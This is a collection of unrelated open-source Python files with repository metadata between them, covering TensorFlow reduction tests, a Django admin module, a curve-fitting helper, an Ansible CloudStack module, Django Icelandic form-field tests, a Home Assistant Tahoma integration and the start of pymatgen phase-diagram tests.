"hidden",
"height_mismatch",
"has_default_xf_index",
"xf_index",
"additional_space_above",
"additional_space_below",
)
def __init__(self):
self.height = None
self.has_default_height = None
self.outline_level = None
self.outline_group_starts_ends = None
self.hidden = None
self.height_mismatch = None
self.has_default_xf_index = None
self.xf_index = None
self.additional_space_above = None
self.additional_space_below = None
def __getstate__(self):
return (
self.height,
self.has_default_height,
self.outline_level,
self.outline_group_starts_ends,
self.hidden,
self.height_mismatch,
self.has_default_xf_index,
self.xf_index,
self.additional_space_above,
self.additional_space_below,
)
def __setstate__(self, state):
(
self.height,
self.has_default_height,
self.outline_level,
self.outline_group_starts_ends,
self.hidden,
self.height_mismatch,
self.has_default_xf_index,
self.xf_index,
self.additional_space_above,
self.additional_space_below,
) = state
| mit |
tillahoffmann/tensorflow | tensorflow/compiler/tests/reduce_ops_test.py | 94 | 4627 | # Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for reduction operators."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.compiler.tests.xla_test import XLATestCase
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors_impl
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import googletest
class ReduceOpsTest(XLATestCase):
def _testReduction(self, tf_reduce_fn, np_reduce_fn, dtype, test_inputs,
rtol=1e-4, atol=1e-4):
"""Tests that the output of 'tf_reduce_fn' matches numpy's output."""
for test_input in test_inputs:
with self.test_session() as sess:
with self.test_scope():
a = array_ops.placeholder(dtype)
index = array_ops.placeholder(dtypes.int32)
out = tf_reduce_fn(a, index)
result = sess.run(out, {a: test_input, index: [0]})
self.assertAllClose(result, np_reduce_fn(test_input, axis=0),
rtol=rtol, atol=atol)
result = sess.run(out, {a: test_input, index: [1]})
self.assertAllClose(result, np_reduce_fn(test_input, axis=1),
rtol=rtol, atol=atol)
result = sess.run(out, {a: test_input, index: [-1]})
self.assertAllClose(result, np_reduce_fn(test_input, axis=1),
rtol=rtol, atol=atol)
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError, 'Invalid reduction dim'):
sess.run(out, {a: test_input, index: [-33]})
with self.assertRaisesWithPredicateMatch(
errors_impl.InvalidArgumentError, 'Invalid reduction dim'):
sess.run(out, {a: test_input, index: [2]})
FLOAT_DATA = [
np.zeros(shape=(2, 0)),
np.zeros(shape=(0, 30)),
np.arange(1, 7).reshape(2, 3),
np.arange(-10, -4).reshape(2, 3),
np.arange(-4, 2).reshape(2, 3),
]
NONEMPTY_FLOAT_DATA = [
np.arange(1, 7).reshape(2, 3),
np.arange(-10, -4).reshape(2, 3),
np.arange(-4, 2).reshape(2, 3),
]
BOOL_DATA = [
np.array([], dtype=np.bool).reshape(2, 0),
np.array([], dtype=np.bool).reshape(0, 3),
np.array([[False, True, False], [True, True, False]]),
]
def testReduceSum(self):
self._testReduction(math_ops.reduce_sum, np.sum, np.float32,
self.FLOAT_DATA)
def testReduceProd(self):
self._testReduction(math_ops.reduce_prod, np.prod, np.float32,
self.FLOAT_DATA)
def testReduceMin(self):
def reference_min(inp, axis):
"""Wrapper around np.amin that returns +infinity for an empty input."""
if inp.shape[axis] == 0:
return np.full(inp.shape[0:axis] + inp.shape[axis + 1:], float('inf'))
return np.amin(inp, axis)
self._testReduction(math_ops.reduce_min, reference_min, np.float32,
self.FLOAT_DATA)
def testReduceMax(self):
def reference_max(inp, axis):
"""Wrapper around np.amax that returns -infinity for an empty input."""
if inp.shape[axis] == 0:
return np.full(inp.shape[0:axis] + inp.shape[axis + 1:], float('-inf'))
return np.amax(inp, axis)
self._testReduction(math_ops.reduce_max, reference_max, np.float32,
self.FLOAT_DATA)
def testReduceMean(self):
# TODO(phawkins): mean on XLA currently returns 0 instead of NaN when
# reducing across zero inputs.
self._testReduction(math_ops.reduce_mean, np.mean, np.float32,
self.NONEMPTY_FLOAT_DATA)
def testReduceAll(self):
self._testReduction(math_ops.reduce_all, np.all, np.bool, self.BOOL_DATA)
def testReduceAny(self):
self._testReduction(math_ops.reduce_any, np.any, np.bool, self.BOOL_DATA)
if __name__ == '__main__':
googletest.main()
| apache-2.0 |
lubico-business/django-gitana | lubico/django/contrib/gitana/admin.py | 1 | 2116 | # -*- coding: utf8 -*-
import django.contrib.admin as a
from django.contrib import admin
from django.contrib.auth.models import User
from lubico.django.contrib.gitana.models import Repository, UserKey
__author__ = 'sassman <sven.assmann@lubico.biz>'
__version__ = "1.0.1"
__license__ = "GNU Lesser General Public License"
__package__ = "lubico.django.contrib.gitana"
class RepositoryAdmin(admin.ModelAdmin):
list_display = ('account', 'repository_name', 'full_url', 'git_remote_add')
search_fields = ('account__username', 'slug')
ordering = ('account__username', 'slug')
prepopulated_fields = {'slug': ('name', )}
class UserKeyAdmin(admin.ModelAdmin):
list_display = ('user', 'comment')
def has_add_permission(self, request):
return request.user.is_superuser or request.user.has_perm('gitana.my_add_user_key') or super(UserKeyAdmin, self).has_add_permission(request)
def has_change_permission(self, request, object=None):
if request.user.is_superuser or super(UserKeyAdmin, self).has_change_permission(request, obj=object):
return True
return request.user.has_perm('gitana.my_change_user_key') and (object and object.user == request.user) or (not object)
def has_delete_permission(self, request, obj=None):
if request.user.is_superuser or super(UserKeyAdmin, self).has_delete_permission(request, obj=obj):
return True
return request.user.has_perm('gitana.my_delete_user_key') and obj and obj.user == request.user
def queryset(self, request):
qs = super(UserKeyAdmin, self).queryset(request)
if request.user.is_superuser:
return qs
return qs.filter(user = request.user)
def formfield_for_foreignkey(self, db_field, request=None, **kwargs):
if not request.user.is_superuser and db_field.name == 'user':
kwargs['queryset'] = User.objects.filter(id = request.user.id)
return super(UserKeyAdmin, self).formfield_for_foreignkey(db_field, request, **kwargs)
a.site.register(Repository, RepositoryAdmin)
a.site.register(UserKey, UserKeyAdmin) | gpl-3.0 |
bsipocz/pyspeckit | pyspeckit/mpfit/mpfitexpr.py | 11 | 2384 | """
Copyright (C) 2009 Sergey Koposov
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
"""
import mpfit
import re
import numpy
def mpfitexpr(func, x, y, err , start_params, check=True, full_output=False, **kw):
"""Fit the used defined expression to the data
Input:
- func: string with the function definition
- x: x vector
- y: y vector
- err: vector with the errors of y
- start_params: the starting parameters for the fit
Output:
- The tuple (params, yfit) with best-fit params and the values of func evaluated at x
Keywords:
- check: boolean parameter. If true(default) the function will be checked for sanity
- full_output: boolean parameter. If True(default is False) then instead of best-fit parameters the mpfit object is returned
Example:
params,yfit=mpfitexpr('p[0]+p[2]*(x-p[1])',x,y,err,[0,10,1])
If you need to use numpy functions in your function, then
you must to use the full names of these functions, e.g.:
numpy.sin, numpy.cos etc.
This function is motivated by mpfitexpr() from wonderful MPFIT IDL package
written by Craig Markwardt
"""
def myfunc(p,fjac=None,x=None, y=None, err=None):
return [0, eval('(y-(%s))/err'%func)]
myre = "[^a-zA-Z]p\[(\d+)\]"
r = re.compile(myre)
maxp = -1
for m in re.finditer(r,func):
curp = int(m.group(1))
maxp = curp if curp > maxp else maxp
if check:
if maxp == -1:
raise Exception("wrong function format")
if maxp + 1 != len(start_params):
raise Exception("the length of the start_params != the length of the parameter verctor of the function")
fa={'x' : x, 'y' : y,'err' : err}
res = mpfit.mpfit(myfunc,start_params,functkw=fa,**kw)
yfit = eval(func, globals(), {'x':x, 'p': res.params})
if full_output:
return (res, yfit)
else:
return (res.params, yfit)
| mit |
rahushen/ansible | lib/ansible/modules/cloud/cloudstack/cs_configuration.py | 48 | 8413 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2016, René Moser <mail@renemoser.net>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['stableinterface'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: cs_configuration
short_description: Manages configuration on Apache CloudStack based clouds.
description:
- Manages global, zone, account, storage and cluster configurations.
version_added: "2.1"
author: "René Moser (@resmo)"
options:
name:
description:
- Name of the configuration.
required: true
value:
description:
- Value of the configuration.
required: true
account:
description:
- Ensure the value for corresponding account.
required: false
default: null
domain:
description:
- Domain the account is related to.
- Only considered if C(account) is used.
required: false
default: ROOT
zone:
description:
- Ensure the value for corresponding zone.
required: false
default: null
storage:
description:
- Ensure the value for corresponding storage pool.
required: false
default: null
cluster:
description:
- Ensure the value for corresponding cluster.
required: false
default: null
extends_documentation_fragment: cloudstack
'''
EXAMPLES = '''
# Ensure global configuration
- local_action:
module: cs_configuration
name: router.reboot.when.outofband.migrated
value: false
# Ensure zone configuration
- local_action:
module: cs_configuration
name: router.reboot.when.outofband.migrated
zone: ch-gva-01
value: true
# Ensure storage configuration
- local_action:
module: cs_configuration
name: storage.overprovisioning.factor
storage: storage01
value: 2.0
# Ensure account configuration
- local_action:
module: cs_configuration
name: allow.public.user.templates
value: false
account: acme inc
domain: customers
'''
RETURN = '''
---
category:
description: Category of the configuration.
returned: success
type: string
sample: Advanced
scope:
description: Scope (zone/cluster/storagepool/account) of the parameter that needs to be updated.
returned: success
type: string
sample: storagepool
description:
description: Description of the configuration.
returned: success
type: string
sample: Setup the host to do multipath
name:
description: Name of the configuration.
returned: success
type: string
sample: zone.vlan.capacity.notificationthreshold
value:
description: Value of the configuration.
returned: success
type: string
sample: "0.75"
account:
description: Account of the configuration.
returned: success
type: string
sample: admin
Domain:
description: Domain of account of the configuration.
returned: success
type: string
sample: ROOT
zone:
description: Zone of the configuration.
returned: success
type: string
sample: ch-gva-01
cluster:
description: Cluster of the configuration.
returned: success
type: string
sample: cluster01
storage:
description: Storage of the configuration.
returned: success
type: string
sample: storage01
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.cloudstack import (
AnsibleCloudStack,
cs_argument_spec,
cs_required_together
)
class AnsibleCloudStackConfiguration(AnsibleCloudStack):
def __init__(self, module):
super(AnsibleCloudStackConfiguration, self).__init__(module)
self.returns = {
'category': 'category',
'scope': 'scope',
'value': 'value',
}
self.storage = None
self.account = None
self.cluster = None
def _get_common_configuration_args(self):
args = {
'name': self.module.params.get('name'),
'accountid': self.get_account(key='id'),
'storageid': self.get_storage(key='id'),
'zoneid': self.get_zone(key='id'),
'clusterid': self.get_cluster(key='id'),
}
return args
def get_zone(self, key=None):
# make sure we do net use the default zone
zone = self.module.params.get('zone')
if zone:
return super(AnsibleCloudStackConfiguration, self).get_zone(key=key)
def get_cluster(self, key=None):
if not self.cluster:
cluster_name = self.module.params.get('cluster')
if not cluster_name:
return None
args = {
'name': cluster_name,
}
clusters = self.query_api('listClusters', **args)
if clusters:
self.cluster = clusters['cluster'][0]
self.result['cluster'] = self.cluster['name']
else:
self.module.fail_json(msg="Cluster %s not found." % cluster_name)
return self._get_by_key(key=key, my_dict=self.cluster)
def get_storage(self, key=None):
if not self.storage:
storage_pool_name = self.module.params.get('storage')
if not storage_pool_name:
return None
args = {
'name': storage_pool_name,
}
storage_pools = self.query_api('listStoragePools', **args)
if storage_pools:
self.storage = storage_pools['storagepool'][0]
self.result['storage'] = self.storage['name']
else:
self.module.fail_json(msg="Storage pool %s not found." % storage_pool_name)
return self._get_by_key(key=key, my_dict=self.storage)
def get_configuration(self):
configuration = None
args = self._get_common_configuration_args()
configurations = self.query_api('listConfigurations', **args)
if not configurations:
self.module.fail_json(msg="Configuration %s not found." % args['name'])
configuration = configurations['configuration'][0]
return configuration
def get_value(self):
value = str(self.module.params.get('value'))
if value in ('True', 'False'):
value = value.lower()
return value
def present_configuration(self):
configuration = self.get_configuration()
args = self._get_common_configuration_args()
args['value'] = self.get_value()
if self.has_changed(args, configuration, ['value']):
self.result['changed'] = True
if not self.module.check_mode:
res = self.query_api('updateConfiguration', **args)
configuration = res['configuration']
return configuration
def get_result(self, configuration):
self.result = super(AnsibleCloudStackConfiguration, self).get_result(configuration)
if self.account:
self.result['account'] = self.account['name']
self.result['domain'] = self.domain['path']
elif self.zone:
self.result['zone'] = self.zone['name']
return self.result
def main():
argument_spec = cs_argument_spec()
argument_spec.update(dict(
name=dict(required=True),
value=dict(type='str', required=True),
zone=dict(),
storage=dict(),
cluster=dict(),
account=dict(),
domain=dict(default='ROOT')
))
module = AnsibleModule(
argument_spec=argument_spec,
required_together=cs_required_together(),
supports_check_mode=True
)
acs_configuration = AnsibleCloudStackConfiguration(module)
configuration = acs_configuration.present_configuration()
result = acs_configuration.get_result(configuration)
module.exit_json(**result)
if __name__ == '__main__':
main()
| gpl-3.0 |
kailIII/geraldo | site/newsite/django_1_0/tests/regressiontests/forms/localflavor/is_.py | 19 | 9983 | # -*- coding: utf-8 -*-
# Tests for the contrib/localflavor/ IS form fields.
tests = r"""
## ISIdNumberField #############################################################
>>> from django.contrib.localflavor.is_.forms import *
>>> f = ISIdNumberField()
>>> f.clean('2308803449')
u'230880-3449'
>>> f.clean('230880-3449')
u'230880-3449'
>>> f.clean('230880 3449')
u'230880-3449'
>>> f.clean('230880343')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 10 characters (it has 9).']
>>> f.clean('230880343234')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 11 characters (it has 12).']
>>> f.clean('abcdefghijk')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid Icelandic identification number. The format is XXXXXX-XXXX.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean('2308803439')
Traceback (most recent call last):
...
ValidationError: [u'The Icelandic identification number is not valid.']
>>> f.clean('2308803440')
u'230880-3440'
>>> f = ISIdNumberField(required=False)
>>> f.clean(None)
u''
>>> f.clean('')
u''
## ISPhoneNumberField #############################################################
>>> from django.contrib.localflavor.is_.forms import *
>>> f = ISPhoneNumberField()
>>> f.clean('1234567')
u'1234567'
>>> f.clean('123 4567')
u'1234567'
>>> f.clean('123-4567')
u'1234567'
>>> f.clean('123-456')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('123456')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at least 7 characters (it has 6).']
>>> f.clean('123456555')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 8 characters (it has 9).']
>>> f.clean('abcdefg')
Traceback (most recent call last):
ValidationError: [u'Enter a valid value.']
>>> f.clean(' 1234567 ')
Traceback (most recent call last):
...
ValidationError: [u'Ensure this value has at most 8 characters (it has 9).']
>>> f.clean(' 12367 ')
Traceback (most recent call last):
...
ValidationError: [u'Enter a valid value.']
>>> f.clean('')
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f.clean(None)
Traceback (most recent call last):
...
ValidationError: [u'This field is required.']
>>> f = ISPhoneNumberField(required=False)
>>> f.clean(None)
u''
>>> f.clean('')
u''
## ISPostalCodeSelect #############################################################
>>> from django.contrib.localflavor.is_.forms import *
>>> f = ISPostalCodeSelect()
>>> f.render('foo', 'bar')
u'<select name="foo">\n<option value="101">101 Reykjav\xedk</option>\n<option value="103">103 Reykjav\xedk</option>\n<option value="104">104 Reykjav\xedk</option>\n<option value="105">105 Reykjav\xedk</option>\n<option value="107">107 Reykjav\xedk</option>\n<option value="108">108 Reykjav\xedk</option>\n<option value="109">109 Reykjav\xedk</option>\n<option value="110">110 Reykjav\xedk</option>\n<option value="111">111 Reykjav\xedk</option>\n<option value="112">112 Reykjav\xedk</option>\n<option value="113">113 Reykjav\xedk</option>\n<option value="116">116 Kjalarnes</option>\n<option value="121">121 Reykjav\xedk</option>\n<option value="123">123 Reykjav\xedk</option>\n<option value="124">124 Reykjav\xedk</option>\n<option value="125">125 Reykjav\xedk</option>\n<option value="127">127 Reykjav\xedk</option>\n<option value="128">128 Reykjav\xedk</option>\n<option value="129">129 Reykjav\xedk</option>\n<option value="130">130 Reykjav\xedk</option>\n<option value="132">132 Reykjav\xedk</option>\n<option value="150">150 Reykjav\xedk</option>\n<option value="155">155 Reykjav\xedk</option>\n<option value="170">170 Seltjarnarnes</option>\n<option value="172">172 Seltjarnarnes</option>\n<option value="190">190 Vogar</option>\n<option value="200">200 K\xf3pavogur</option>\n<option value="201">201 K\xf3pavogur</option>\n<option value="202">202 K\xf3pavogur</option>\n<option value="203">203 K\xf3pavogur</option>\n<option value="210">210 Gar\xf0ab\xe6r</option>\n<option value="212">212 Gar\xf0ab\xe6r</option>\n<option value="220">220 Hafnarfj\xf6r\xf0ur</option>\n<option value="221">221 Hafnarfj\xf6r\xf0ur</option>\n<option value="222">222 Hafnarfj\xf6r\xf0ur</option>\n<option value="225">225 \xc1lftanes</option>\n<option value="230">230 Reykjanesb\xe6r</option>\n<option value="232">232 Reykjanesb\xe6r</option>\n<option value="233">233 Reykjanesb\xe6r</option>\n<option value="235">235 Keflav\xedkurflugv\xf6llur</option>\n<option value="240">240 Grindav\xedk</option>\n<option value="245">245 Sandger\xf0i</option>\n<option value="250">250 Gar\xf0ur</option>\n<option value="260">260 Reykjanesb\xe6r</option>\n<option value="270">270 Mosfellsb\xe6r</option>\n<option value="300">300 Akranes</option>\n<option value="301">301 Akranes</option>\n<option value="302">302 Akranes</option>\n<option value="310">310 Borgarnes</option>\n<option value="311">311 Borgarnes</option>\n<option value="320">320 Reykholt \xed Borgarfir\xf0i</option>\n<option value="340">340 Stykkish\xf3lmur</option>\n<option value="345">345 Flatey \xe1 Brei\xf0afir\xf0i</option>\n<option value="350">350 Grundarfj\xf6r\xf0ur</option>\n<option value="355">355 \xd3lafsv\xedk</option>\n<option value="356">356 Sn\xe6fellsb\xe6r</option>\n<option value="360">360 Hellissandur</option>\n<option value="370">370 B\xfa\xf0ardalur</option>\n<option value="371">371 B\xfa\xf0ardalur</option>\n<option value="380">380 Reykh\xf3lahreppur</option>\n<option value="400">400 \xcdsafj\xf6r\xf0ur</option>\n<option value="401">401 \xcdsafj\xf6r\xf0ur</option>\n<option value="410">410 Hn\xedfsdalur</option>\n<option value="415">415 Bolungarv\xedk</option>\n<option value="420">420 S\xfa\xf0av\xedk</option>\n<option value="425">425 Flateyri</option>\n<option value="430">430 Su\xf0ureyri</option>\n<option value="450">450 Patreksfj\xf6r\xf0ur</option>\n<option value="451">451 Patreksfj\xf6r\xf0ur</option>\n<option value="460">460 T\xe1lknafj\xf6r\xf0ur</option>\n<option value="465">465 B\xedldudalur</option>\n<option value="470">470 \xdeingeyri</option>\n<option value="471">471 \xdeingeyri</option>\n<option value="500">500 Sta\xf0ur</option>\n<option value="510">510 H\xf3lmav\xedk</option>\n<option value="512">512 H\xf3lmav\xedk</option>\n<option value="520">520 Drangsnes</option>\n<option value="522">522 Kj\xf6rvogur</option>\n<option value="523">523 B\xe6r</option>\n<option value="524">524 Nor\xf0urfj\xf6r\xf0ur</option>\n<option value="530">530 Hvammstangi</option>\n<option value="531">531 Hvammstangi</option>\n<option value="540">540 Bl\xf6ndu\xf3s</option>\n<option value="541">541 Bl\xf6ndu\xf3s</option>\n<option value="545">545 Skagastr\xf6nd</option>\n<option value="550">550 Sau\xf0\xe1rkr\xf3kur</option>\n<option value="551">551 Sau\xf0\xe1rkr\xf3kur</option>\n<option value="560">560 Varmahl\xed\xf0</option>\n<option value="565">565 Hofs\xf3s</option>\n<option value="566">566 Hofs\xf3s</option>\n<option value="570">570 Flj\xf3t</option>\n<option value="580">580 Siglufj\xf6r\xf0ur</option>\n<option value="600">600 Akureyri</option>\n<option value="601">601 Akureyri</option>\n<option value="602">602 Akureyri</option>\n<option value="603">603 Akureyri</option>\n<option value="610">610 Greniv\xedk</option>\n<option value="611">611 Gr\xedmsey</option>\n<option value="620">620 Dalv\xedk</option>\n<option value="621">621 Dalv\xedk</option>\n<option value="625">625 \xd3lafsfj\xf6r\xf0ur</option>\n<option value="630">630 Hr\xedsey</option>\n<option value="640">640 H\xfasav\xedk</option>\n<option value="641">641 H\xfasav\xedk</option>\n<option value="645">645 Fossh\xf3ll</option>\n<option value="650">650 Laugar</option>\n<option value="660">660 M\xfdvatn</option>\n<option value="670">670 K\xf3pasker</option>\n<option value="671">671 K\xf3pasker</option>\n<option value="675">675 Raufarh\xf6fn</option>\n<option value="680">680 \xde\xf3rsh\xf6fn</option>\n<option value="681">681 \xde\xf3rsh\xf6fn</option>\n<option value="685">685 Bakkafj\xf6r\xf0ur</option>\n<option value="690">690 Vopnafj\xf6r\xf0ur</option>\n<option value="700">700 Egilssta\xf0ir</option>\n<option value="701">701 Egilssta\xf0ir</option>\n<option value="710">710 Sey\xf0isfj\xf6r\xf0ur</option>\n<option value="715">715 Mj\xf3ifj\xf6r\xf0ur</option>\n<option value="720">720 Borgarfj\xf6r\xf0ur eystri</option>\n<option value="730">730 Rey\xf0arfj\xf6r\xf0ur</option>\n<option value="735">735 Eskifj\xf6r\xf0ur</option>\n<option value="740">740 Neskaupsta\xf0ur</option>\n<option value="750">750 F\xe1skr\xfa\xf0sfj\xf6r\xf0ur</option>\n<option value="755">755 St\xf6\xf0varfj\xf6r\xf0ur</option>\n<option value="760">760 Brei\xf0dalsv\xedk</option>\n<option value="765">765 Dj\xfapivogur</option>\n<option value="780">780 H\xf6fn \xed Hornafir\xf0i</option>\n<option value="781">781 H\xf6fn \xed Hornafir\xf0i</option>\n<option value="785">785 \xd6r\xe6fi</option>\n<option value="800">800 Selfoss</option>\n<option value="801">801 Selfoss</option>\n<option value="802">802 Selfoss</option>\n<option value="810">810 Hverager\xf0i</option>\n<option value="815">815 \xdeorl\xe1ksh\xf6fn</option>\n<option value="820">820 Eyrarbakki</option>\n<option value="825">825 Stokkseyri</option>\n<option value="840">840 Laugarvatn</option>\n<option value="845">845 Fl\xfa\xf0ir</option>\n<option value="850">850 Hella</option>\n<option value="851">851 Hella</option>\n<option value="860">860 Hvolsv\xf6llur</option>\n<option value="861">861 Hvolsv\xf6llur</option>\n<option value="870">870 V\xedk</option>\n<option value="871">871 V\xedk</option>\n<option value="880">880 Kirkjub\xe6jarklaustur</option>\n<option value="900">900 Vestmannaeyjar</option>\n<option value="902">902 Vestmannaeyjar</option>\n</select>'
"""
| lgpl-3.0 |
tchellomello/home-assistant | homeassistant/components/tahoma/__init__.py | 15 | 5024 | """Support for Tahoma devices."""
from collections import defaultdict
import logging
from requests.exceptions import RequestException
from tahoma_api import Action, TahomaApi
import voluptuous as vol
from homeassistant.const import CONF_EXCLUDE, CONF_PASSWORD, CONF_USERNAME
from homeassistant.helpers import config_validation as cv, discovery
from homeassistant.helpers.entity import Entity
_LOGGER = logging.getLogger(__name__)
DOMAIN = "tahoma"
TAHOMA_ID_FORMAT = "{}_{}"
CONFIG_SCHEMA = vol.Schema(
{
DOMAIN: vol.Schema(
{
vol.Required(CONF_USERNAME): cv.string,
vol.Required(CONF_PASSWORD): cv.string,
vol.Optional(CONF_EXCLUDE, default=[]): vol.All(
cv.ensure_list, [cv.string]
),
}
)
},
extra=vol.ALLOW_EXTRA,
)
TAHOMA_COMPONENTS = ["binary_sensor", "cover", "lock", "scene", "sensor", "switch"]
TAHOMA_TYPES = {
"io:AwningValanceIOComponent": "cover",
"io:ExteriorVenetianBlindIOComponent": "cover",
"io:DiscreteGarageOpenerIOComponent": "cover",
"io:DiscreteGarageOpenerWithPartialPositionIOComponent": "cover",
"io:HorizontalAwningIOComponent": "cover",
"io:GarageOpenerIOComponent": "cover",
"io:LightIOSystemSensor": "sensor",
"io:OnOffIOComponent": "switch",
"io:OnOffLightIOComponent": "switch",
"io:RollerShutterGenericIOComponent": "cover",
"io:RollerShutterUnoIOComponent": "cover",
"io:RollerShutterVeluxIOComponent": "cover",
"io:RollerShutterWithLowSpeedManagementIOComponent": "cover",
"io:SomfyBasicContactIOSystemSensor": "sensor",
"io:SomfyContactIOSystemSensor": "sensor",
"io:TemperatureIOSystemSensor": "sensor",
"io:VerticalExteriorAwningIOComponent": "cover",
"io:VerticalInteriorBlindVeluxIOComponent": "cover",
"io:WindowOpenerVeluxIOComponent": "cover",
"opendoors:OpenDoorsSmartLockComponent": "lock",
"rtds:RTDSContactSensor": "sensor",
"rtds:RTDSMotionSensor": "sensor",
"rtds:RTDSSmokeSensor": "smoke",
"rts:BlindRTSComponent": "cover",
"rts:CurtainRTSComponent": "cover",
"rts:DualCurtainRTSComponent": "cover",
"rts:ExteriorVenetianBlindRTSComponent": "cover",
"rts:GarageDoor4TRTSComponent": "switch",
"rts:LightRTSComponent": "switch",
"rts:RollerShutterRTSComponent": "cover",
"rts:OnOffRTSComponent": "switch",
"rts:VenetianBlindRTSComponent": "cover",
"somfythermostat:SomfyThermostatTemperatureSensor": "sensor",
"somfythermostat:SomfyThermostatHumiditySensor": "sensor",
"zwave:OnOffLightZWaveComponent": "switch",
}
def setup(hass, config):
"""Activate Tahoma component."""
conf = config[DOMAIN]
username = conf.get(CONF_USERNAME)
password = conf.get(CONF_PASSWORD)
exclude = conf.get(CONF_EXCLUDE)
try:
api = TahomaApi(username, password)
except RequestException:
_LOGGER.exception("Error when trying to log in to the Tahoma API")
return False
try:
api.get_setup()
devices = api.get_devices()
scenes = api.get_action_groups()
except RequestException:
_LOGGER.exception("Error when getting devices from the Tahoma API")
return False
hass.data[DOMAIN] = {"controller": api, "devices": defaultdict(list), "scenes": []}
for device in devices:
_device = api.get_device(device)
if all(ext not in _device.type for ext in exclude):
device_type = map_tahoma_device(_device)
if device_type is None:
_LOGGER.warning(
"Unsupported type %s for Tahoma device %s",
_device.type,
_device.label,
)
continue
hass.data[DOMAIN]["devices"][device_type].append(_device)
for scene in scenes:
hass.data[DOMAIN]["scenes"].append(scene)
for component in TAHOMA_COMPONENTS:
discovery.load_platform(hass, component, DOMAIN, {}, config)
return True
def map_tahoma_device(tahoma_device):
"""Map Tahoma device types to Home Assistant components."""
return TAHOMA_TYPES.get(tahoma_device.type)
class TahomaDevice(Entity):
"""Representation of a Tahoma device entity."""
def __init__(self, tahoma_device, controller):
"""Initialize the device."""
self.tahoma_device = tahoma_device
self.controller = controller
self._name = self.tahoma_device.label
@property
def name(self):
"""Return the name of the device."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
return {"tahoma_device_id": self.tahoma_device.url}
def apply_action(self, cmd_name, *args):
"""Apply Action to Device."""
action = Action(self.tahoma_device.url)
action.add_command(cmd_name, *args)
self.controller.apply_actions("HomeAssistant", [action])
| apache-2.0 |
blondegeek/pymatgen | pymatgen/analysis/tests/test_phase_diagram.py | 3 | 25453 | # coding: utf-8
# Copyright (c) Pymatgen Development Team.
# Distributed under the terms of the MIT License.
import unittest
import os
from numbers import Number
import warnings
from pathlib import Path
from pymatgen.analysis.phase_diagram import *
from pymatgen.entries.computed_entries import ComputedEntry
from pymatgen.core.periodic_table import Element, DummySpecie
from pymatgen.core.composition import Composition
from pymatgen.entries.entry_tools import EntrySet
module_dir = Path(__file__).absolute().parent
class PDEntryTest(unittest.TestCase):
'''
Test all functions using a ficitious entry
'''
def setUp(self):
comp = Composition("LiFeO2")
self.entry = PDEntry(comp, 53)
self.gpentry = GrandPotPDEntry(self.entry, {Element('O'): 1.5})
def test_get_energy(self):
self.assertEqual(self.entry.energy, 53, "Wrong energy!")
self.assertEqual(self.gpentry.energy, 50, "Wrong energy!")
def test_get_energy_per_atom(self):
self.assertEqual(self.entry.energy_per_atom, 53.0 / 4,
"Wrong energy per atom!")
self.assertEqual(self.gpentry.energy_per_atom, 50.0 / 2,
"Wrong energy per atom!")
def test_get_name(self):
self.assertEqual(self.entry.name, 'LiFeO2', "Wrong name!")
self.assertEqual(self.gpentry.name, 'LiFeO2', "Wrong name!")
def test_get_composition(self):
comp = self.entry.composition
expected_comp = Composition('LiFeO2')
self.assertEqual(comp, expected_comp, "Wrong composition!")
comp = self.gpentry.composition
expected_comp = Composition("LiFe")
self.assertEqual(comp, expected_comp, "Wrong composition!")
def test_is_element(self):
self.assertFalse(self.entry.is_element)
self.assertFalse(self.gpentry.is_element)
def test_to_from_dict(self):
d = self.entry.as_dict()
gpd = self.gpentry.as_dict()
entry = PDEntry.from_dict(d)
self.assertEqual(entry.name, 'LiFeO2', "Wrong name!")
self.assertEqual(entry.energy_per_atom, 53.0 / 4)
gpentry = GrandPotPDEntry.from_dict(gpd)
self.assertEqual(gpentry.name, 'LiFeO2', "Wrong name!")
self.assertEqual(gpentry.energy_per_atom, 50.0 / 2)
d_anon = d.copy()
del d_anon['name']
try:
entry = PDEntry.from_dict(d_anon)
except KeyError:
self.fail("Should not need to supply name!")
def test_str(self):
self.assertIsNotNone(str(self.entry))
def test_read_csv(self):
